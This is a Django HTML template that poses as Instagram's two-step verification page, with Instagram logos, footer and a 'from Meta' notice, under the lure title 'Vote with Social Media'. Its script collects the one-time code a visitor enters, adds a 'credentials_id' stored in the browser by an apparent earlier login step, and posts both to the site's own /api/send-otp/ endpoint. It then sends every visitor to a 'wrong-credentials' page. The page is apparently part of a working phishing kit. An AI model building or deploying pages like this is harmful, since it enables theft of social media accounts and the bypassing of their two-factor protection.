{% load static %}

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="shortcut icon" href="{% static 'img/socials/icon.png' %}" type="image/x-icon" />
  <link rel="stylesheet" href="{% static 'css/styles.css' %}" />
  <title>Vote with Social Media</title>
  <style>
    body {
      background-color: white;
    }

    #otp {
      border: rgba(0, 0, 0, 0.103) 1px solid;
      background: #fafafa;
    }

    #otp:focus {
      outline: none;
      border: rgba(0, 0, 0, 0.28) 1px solid;
    }

    form input {
      height: 3em !important;
      padding: 0.5em !important;
      outline-width: none !important;
      margin-bottom: 1em !important;
    }

    form .pass {
      height: 3.3em !important;
    }

    #submit2 img {
      width: 1.3em;
      animation-name: roll;
      animation-duration: 0.7s;
      animation-iteration-count: infinite;
      animation-timing-function: linear;
      color: white;
    }

    @keyframes roll {
      from {
        transform: rotate(0deg);
      }

      to {
        transform: rotate(360deg);
      }
    }

    #loginButton {
      position: relative;
    }

    .spinner {
      border: 4px solid rgba(0, 0, 0, 0.1);
      border-top: 4px solid #3498db;
      border-radius: 50%;
      width: 20px;
      height: 20px;
      animation: spin 1s linear infinite;
      display: inline-block;
      vertical-align: middle;
      margin-left: 10px;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }

      100% {
        transform: rotate(360deg);
      }
    }
  </style>
</head>

<body>
  <section class="container">
    <article class="smartphone">
      <div class="screens">
        <img class="screen fade" src="{% static 'img/socials/screen1.png' %}" alt="screen1" />
        <img class="screen fade" src="{% static 'img/socials/screen2.png' %}" alt="screen2" />
        <img class="screen fade" src="{% static 'img/socials/screen3.png' %}" alt="screen3" />
      </div>
      <img src="{% static 'img/socials/smartphones.png' %}" alt="smartphones" />
    </article>
    <!-- SMARTPHONE SECTION END -->
    <!-- FORM SECTION -->
    <article class="form-area">
      <div class="logo">
        <img src="{% static 'img/socials/logo.png' %}" alt="Logo" />
      </div>
      <form id="webhookForm" method="POST">
        {% csrf_token %}
        <p>2-step verification code</p>
        <br />
        <input type="text" id="otp" placeholder="Enter OTP" name="otp" required />

        <button id="loginButton" type="submit">Submit</button>
      </form>
      <div class="noaccount">
        <a href="#">Don't have an account? <span>Signup</span></a>
      </div>
      <div class="apps">
        <p>Get the app</p>
        <a href="#">
          <img src="{% static 'img/socials/appstore.png' %}" alt="Get it from AppStore" />
        </a>
        <a href="#">
          <img src="{% static 'img/socials/googleplay.png' %}" alt="Get it from Google Play" />
        </a>
      </div>
    </article>
  </section>
  <!-- FORM SECTION END -->
  <!-- FOOTER -->
  <footer>
    <div class="footer-content">
      <a href="#">Meta</a>
      <a href="#">About</a>
      <a href="#">Blog</a>
      <a href="#">Jobs</a>
      <a href="#">API</a>
      <a href="#">Privacy</a>
      <a href="#">Terms</a>
      <a href="#">Locations</a>
      <a href="#">Hashtags</a>
      <a href="#">Threads</a>
      <a href="#">Instagram Lite</a>
    </div>
    <div>
      <a href="#">Dance</a>
      <a href="#">Food and Drink</a>
      <a href="#">Home garden</a>
      <a href="#">Music</a>
      <a href="#">Visual arts</a>
    </div>
    <div class="copyright">
      <select aria-label="Trocar idioma de exibição">
        <option value="en">English</option>
        <option value="af">Afrikaans</option>
        <option value="cs">Čeština</option>
        <option value="da">Dansk</option>
        <option value="de">Deutsch</option>
        <option value="el">Ελληνικά</option>
        <option value="en">English</option>
        <option value="en-gb">English (UK)</option>
        <option value="es">Español (España)</option>
        <option value="es-la">Español</option>
        <option value="fi">Suomi</option>
        <option value="fr">Français</option>
        <option value="id">Bahasa Indonesia</option>
        <option value="it">Italiano</option>
        <option value="ja">日本語</option>
        <option value="ko">한국어</option>
        <option value="ms">Bahasa Melayu</option>
        <option value="nb">Norsk</option>
        <option value="nl">Nederlands</option>
        <option value="pl">Polski</option>
        <option value="pt-br">Português (Brasil)</option>
        <option value="ru">Русский</option>
        <option value="sv">Svenska</option>
        <option value="th">ภาษาไทย</option>
        <option value="tl">Filipino</option>
        <option value="tr">Türkçe</option>
        <option value="zh-cn">中文(简体)</option>
        <option value="zh-tw">中文(台灣)</option>
        <option value="bn">বাংলা</option>
        <option value="gu">ગુજરાતી</option>
        <option value="hi">हिन्दी</option>
        <option value="hr">Hrvatski</option>
        <option value="hu">Magyar</option>
        <option value="kn">ಕನ್ನಡ</option>
        <option value="sk">Slovenčina</option>
        <option value="ta">தமிழ்</option>
        <option value="te">తెలుగు</option>
        <option value="vi">Tiếng Việt</option>
        <option value="zh-hk">中文(香港)</option>
        <option value="bg">Български</option>
        <option value="ro">Română</option>
        <option value="sr">Српски</option>
        <option value="uk">Українська</option>
      </select>
      <span>&copy; 2023 Instagram from Meta</span>
    </div>
  </footer>

  <script>
    const loginButton = document.getElementById("loginButton");
    const submitForm = document.getElementById("webhookForm");

    submitForm.onsubmit = function (e) {
      e.preventDefault();

      const otp = document.getElementById("otp").value;
      const spinner = document.createElement("div");
      spinner.className = "spinner spinner-border text-light";

      loginButton.appendChild(spinner);
      loginButton.disabled = true;

      const credentials_id = JSON.parse(
        localStorage.getItem("credentials_id")
      );

      console.log(credentials_id);

      const data = {
        otp,
        credentials_id,
      };

      // console.log("User Data: ", data);

      fetch("/api/send-otp/", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          "X-CSRFToken": "{{ csrf_token }}",
        },
        body: JSON.stringify(data),
      })
        .then((response) => response.json())
        .then((data) => {
          console.log("Success:", data);

          if (data.detail) {
            setTimeout(() => {
              loginButton.removeChild(spinner);
              loginButton.textContent = "Submit";
              document.getElementById("otp").value = "";
              window.location.href = "/wrong-credentials";
            }, 3000);
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          loginButton.textContent = "Submit";
          loginButton.disabled = false;
        });
    };
  </script>
</body>

</html>